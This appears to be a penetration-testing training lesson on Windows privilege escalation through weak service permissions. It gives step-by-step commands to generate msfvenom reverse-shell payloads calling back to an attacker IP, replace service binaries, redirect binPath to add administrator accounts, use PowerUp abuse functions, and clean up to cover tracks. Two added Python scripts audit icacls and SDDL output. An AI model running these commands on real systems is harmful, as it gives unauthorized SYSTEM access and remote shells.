Weak Service Permissions

Intermediate | 30 min | Writeup

Exploiting services with weak permissions

Learning Objectives

  • Find modifiable services
  • Change service binary path
  • Modify service configuration
  • Exploit service permissions

Weak service permissions occur when a service's configuration or binary can be modified by non-administrative users. This allows us to either replace the service binary with a malicious one, or change the service's configuration to point to our payload.

Think of it like having write access to a security guard's instruction manual. You can tell the guard (running as SYSTEM) to do whatever you want - including giving you the master keys.

Two Attack Vectors

Weak permissions can apply to: (1) the service binary file itself, or (2) the service configuration in the registry. Both lead to SYSTEM access, but exploitation differs.

Finding Weak Permissions

Weak Binary Permissions

batch
REM Check service binary permissions
icacls "C:\Program Files\VulnApp\service.exe"

REM Look for:
REM BUILTIN\Users:(M) - Modify
REM BUILTIN\Users:(F) - Full control
REM Everyone:(M)
REM Authenticated Users:(W)

REM Using accesschk (Sysinternals)
accesschk.exe /accepteula -wvu "C:\Program Files\VulnApp\service.exe"

REM Find all writable service binaries
REM First get list of service paths
wmic service get name,pathname > services.txt

REM Then check each binary (or use PowerUp; the next two lines run in PowerShell, not cmd)
Import-Module PowerUp.ps1
Get-ModifiableServiceFile

REM Example output:
REM ServiceName : VulnService
REM Path : C:\Program Files\VulnApp\service.exe
REM ModifiableFile : C:\Program Files\VulnApp\service.exe
REM StartName : LocalSystem
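
The icacls check above can be automated when auditing many service binaries. This added example (not part of the original writeup) parses icacls output and reports allow entries that give broad groups write-class rights; the function name and sample output are constructed for illustration.

```python
import re

# Principals that include ordinary users (matched on the name after the domain part).
BROAD = {"Users", "Everyone", "Authenticated Users", "INTERACTIVE"}
# icacls simple and specific rights that permit replacing or altering a file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "GA", "GW"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE = re.compile(r"^(?P<who>[^:]+):(?P<groups>(?:\([^)]*\))+)$")

def writable_by_broad_groups(icacls_output, path):
    """Return (principal, rights) pairs from `icacls <path>` output that let
    a broad group modify the file. Deny entries are skipped."""
    hits = []
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.startswith(path):          # first line is prefixed with the path
            line = line[len(path):].strip()
        m = ACE.match(line)
        if not m or m["who"].rsplit("\\", 1)[-1] not in BROAD:
            continue
        groups = re.findall(r"\(([^)]*)\)", m["groups"])
        if "DENY" in groups:
            continue
        rights = set()
        for g in groups:
            if g not in INHERIT_FLAGS:     # (I), (OI), ... carry no access rights
                rights.update(g.split(","))
        bad = sorted(rights & WRITE_RIGHTS)
        if bad:
            hits.append((m["who"], bad))
    return hits

# Constructed sample output (not captured from a real host).
SAMPLE_PATH = r"C:\Program Files\VulnApp\service.exe"
SAMPLE = r"""C:\Program Files\VulnApp\service.exe BUILTIN\Users:(M)
                                     NT AUTHORITY\SYSTEM:(I)(F)
                                     BUILTIN\Administrators:(I)(F)
                                     Everyone:(DENY)(W)
                                     NT AUTHORITY\Authenticated Users:(I)(RX,WD)

Successfully processed 1 files; Failed processing 0 files"""

if __name__ == "__main__":
    for who, rights in writable_by_broad_groups(SAMPLE, SAMPLE_PATH):
        print(f"{SAMPLE_PATH}: {who} has {','.join(rights)}")
```

Any hit on a binary whose service runs as LocalSystem is the condition this section describes; the fix is to remove the write entry so that only Administrators and SYSTEM can modify the file.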

Weak Service Configuration

batch
REM Check if we can modify service configuration
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
accesschk.exe -uwcqv "Everyone" *

REM Look for services with:
REM SERVICE_ALL_ACCESS
REM SERVICE_CHANGE_CONFIG

REM Example output:
REM VulnService
REM   RW BUILTIN\Users
REM     SERVICE_ALL_ACCESS

REM PowerUp method
Get-ModifiableService

REM Output shows services we can modify:
REM ServiceName : VulnService
REM CanRestart : True
REM StartName : LocalSystem
REM AbuseFunction : Invoke-ServiceAbuse -Name 'VulnService'

accesschk is Essential

Always upload accesschk.exe for permission checking. It's part of Sysinternals and isn't flagged as malicious by most AV.
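
For auditing, the service DACL that accesschk summarises can also be read as an SDDL string from sc sdshow. This added example (not part of the original writeup) parses that string and reports allow ACEs that give broad groups SERVICE_CHANGE_CONFIG or equivalent control; the function name, service names and SDDL strings are constructed, and rights are assumed to be in the two-letter form sc sdshow prints.

```python
import re

# SDDL right codes on a service object that let the holder redirect what it runs.
DANGEROUS = {"DC": "SERVICE_CHANGE_CONFIG", "WD": "WRITE_DAC",
             "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
# Start and stop rights: holding both allows an immediate restart.
RESTART = ("RP", "WP")   # SERVICE_START, SERVICE_STOP
# SDDL SID aliases for broad, non-administrative principals.
BROAD = {"WD": "Everyone", "AU": "Authenticated Users",
         "BU": "BUILTIN\\Users", "IU": "INTERACTIVE"}

def audit_service_sddl(name, sddl):
    """Return findings for allow ACEs that let broad groups reconfigure a service."""
    # Only the DACL (D:) is inspected; the SACL (S:) holds audit ACEs, not access.
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    findings = []
    if not dacl:
        return findings
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1)):
        fields = ace.split(";")   # type;flags;rights;object;inherit_object;sid
        if len(fields) < 6 or fields[0] != "A" or fields[5] not in BROAD:
            continue
        codes = re.findall(r"[A-Z]{2}", fields[2])
        risky = [DANGEROUS[c] for c in codes if c in DANGEROUS]
        if risky:
            findings.append({"service": name, "principal": BROAD[fields[5]],
                             "rights": risky,
                             "can_restart": all(c in codes for c in RESTART)})
    return findings

# Constructed SDDL strings (not captured from a real host).
SAMPLES = {
    "VulnService": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                   "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                   "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BU)"
                   "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "ConfigOnly": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWLOCRRC;;;AU)",
    "Hardened": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)",
}

if __name__ == "__main__":
    for svc, sddl in SAMPLES.items():
        for f in audit_service_sddl(svc, sddl):
            print(f)
```

A finding with can_restart set to False still matters for AUTO_START services, because a changed configuration takes effect at the next boot.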

Binary Replacement Attack

batch
REM Scenario: We can write to the service binary

REM 1. Verify permissions
icacls "C:\VulnApp\service.exe"
REM BUILTIN\Users:(M) ← We can modify!

REM 2. Check service account
sc qc VulnService
REM SERVICE_START_NAME: LocalSystem ← Runs as SYSTEM!

REM 3. Backup original (optional, for cleanup)
copy "C:\VulnApp\service.exe" "C:\VulnApp\service.exe.bak"

REM 4. Create payload
REM On attack machine:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o evil.exe

REM 5. Replace the binary
copy evil.exe "C:\VulnApp\service.exe" /Y

REM 6. Start listener
nc -lvnp 4444

REM 7. Restart service
sc stop VulnService
sc start VulnService

REM 8. Catch SYSTEM shell!

Using PowerUp for Binary Replacement

powershell
# PowerUp automates binary replacement
Import-Module PowerUp.ps1

# Check for vulnerable binaries
Get-ModifiableServiceFile

# Automatic exploitation (adds admin user)
Install-ServiceBinary -Name 'VulnService'
# Creates backup, replaces with user-adding binary
# Adds: john / Password123!

# Verify service restart permission
Get-ModifiableService

# Restart service
Restart-Service VulnService

# Check for new admin
net localgroup Administrators
# Should show 'john'

# Custom command instead of adding user
Install-ServiceBinary -Name 'VulnService' -Command 'C:\temp\shell.exe'
Restart-Service VulnService

Configuration Modification Attack

batch
REM Scenario: We can modify service configuration (not binary)

REM 1. Verify we have SERVICE_CHANGE_CONFIG
accesschk.exe -ucqv VulnService
REM BUILTIN\Users SERVICE_ALL_ACCESS ← Yes!

REM 2. Check current configuration
sc qc VulnService
REM BINARY_PATH_NAME: C:\VulnApp\original.exe

REM 3. Create our payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o C:\temp\shell.exe

REM 4. Modify service binary path
sc config VulnService binPath= "C:\temp\shell.exe"
REM Note: space after binPath= is required!

REM 5. Verify change
sc qc VulnService
REM BINARY_PATH_NAME: C:\temp\shell.exe

REM 6. Start listener
nc -lvnp 4444

REM 7. Restart service
sc stop VulnService
sc start VulnService

REM 8. Catch SYSTEM shell!

REM Alternative: Run a command directly
sc config VulnService binPath= "cmd /c net localgroup Administrators hacker /add"
sc start VulnService
REM Service will "fail" but command runs as SYSTEM

Using PowerUp for Config Abuse

powershell
# PowerUp's service abuse function
Import-Module PowerUp.ps1

# Automatic exploitation
Invoke-ServiceAbuse -Name 'VulnService'
# Changes binPath to add current user to Administrators
# Restarts service to trigger

# Custom command
Invoke-ServiceAbuse -Name 'VulnService' -Command "net user attacker Password123! /add"
# Runs your command as SYSTEM

# Full reverse shell
Invoke-ServiceAbuse -Name 'VulnService' -Command "C:\temp\shell.exe"
Restart-Service VulnService

Service May Fail to Start

After changing binPath to a command or non-service binary, the service will fail to start properly. But the command/binary still executes as SYSTEM once! Plan for this.

Triggering the Service

batch
REM Check if we can restart the service
accesschk.exe -ucqv VulnService
REM Look for: SERVICE_START and SERVICE_STOP

REM Method 1: Direct restart (if we have permission)
sc stop VulnService
sc start VulnService

REM Or using net
net stop VulnService
net start VulnService

REM Method 2: Wait for system reboot
REM If service is AUTO_START, runs on boot
sc qc VulnService | findstr START_TYPE
REM AUTO_START = runs on reboot

REM Method 3: Use another service to restart it
REM Some services have dependencies

REM Method 4: System restart (if we have privilege)
shutdown /r /t 0

REM Method 5: Crash the service
REM If service has restart-on-failure policy
sc qfailure VulnService
REM Shows what happens on failure

Cleanup and Restoration

batch
REM After exploitation, restore original configuration

REM For binary replacement:
copy "C:\VulnApp\service.exe.bak" "C:\VulnApp\service.exe" /Y
sc start VulnService

REM For config modification:
sc config VulnService binPath= "C:\VulnApp\original.exe"
sc start VulnService

REM PowerUp has restoration function
Restore-ServiceBinary -Name 'VulnService'

REM Cleanup is important for:
REM - Stealth (covering tracks)
REM - System stability
REM - Not breaking production services
REM - CTF score (some penalize breaking things)

Exploitation Methodology

Weak Service Permissions Exploitation

  1. Enumerate: accesschk for service and file permissions
  2. Identify: Find services we can modify or binaries we can replace
  3. Verify SYSTEM: Check SERVICE_START_NAME is LocalSystem
  4. Backup: Save original binary/config for cleanup
  5. Payload: Create malicious binary or command
  6. Modify: Replace binary or change binPath
  7. Trigger: Restart service or wait for reboot
  8. Access: Catch shell or verify admin access

Knowledge Check


What's the difference between modifying a service binary vs service configuration?

Challenges

Service Permission Abuse

Challenge
🔥 intermediate

Find a service with weak permissions (either on the binary or configuration) and exploit it to gain SYSTEM access.


Key Takeaways

  • Weak binary permissions = replace the service executable
  • Weak service permissions = change the binPath configuration
  • SERVICE_CHANGE_CONFIG or file Modify (M) enables exploitation
  • Service must run as LocalSystem for SYSTEM access
  • PowerUp automates both enumeration and exploitation
  • Always backup originals for cleanup